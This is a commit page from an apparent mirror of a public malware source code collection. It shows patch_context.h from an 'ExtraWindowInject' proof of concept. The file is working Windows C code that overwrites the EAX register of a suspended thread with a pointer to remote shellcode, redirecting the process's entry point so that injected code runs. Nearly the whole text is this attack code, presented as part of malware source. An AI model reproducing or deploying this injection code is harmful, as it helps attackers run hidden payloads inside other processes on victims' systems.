daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

updates and moves

Browse Source 
n/a
This commit is contained in:
vxunderground
2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Win32/Proof of Concepts/ExtraWindowInject/src/patch_context.h
+39
View File
@@ -0,0 +1,39 @@
#pragma once
#include <Windows.h>
//32-bit version
bool patch_context(HANDLE hThread, LPVOID remote_shellcode_ptr)
{
//get initial context of the target:
BOOL res = FALSE;
#if defined(_WIN64)
WOW64_CONTEXT context;
memset(&context, 0, sizeof(WOW64_CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = Wow64GetThreadContext(hThread, &context);
#else
CONTEXT context;
memset(&context, 0, sizeof(CONTEXT));
context.ContextFlags = CONTEXT_INTEGER;
res = GetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
//if the process was created as suspended and didn't run yet, EAX holds it's entry point:
context.Eax = (DWORD) remote_shellcode_ptr;
#if defined(_WIN64)
Wow64SetThreadContext(hThread, &context);
#else
res = SetThreadContext(hThread, &context);
#endif
if (res == FALSE) {
return false;
}
printf("patched context -> EAX = %x\n", context.Eax);
return true;
}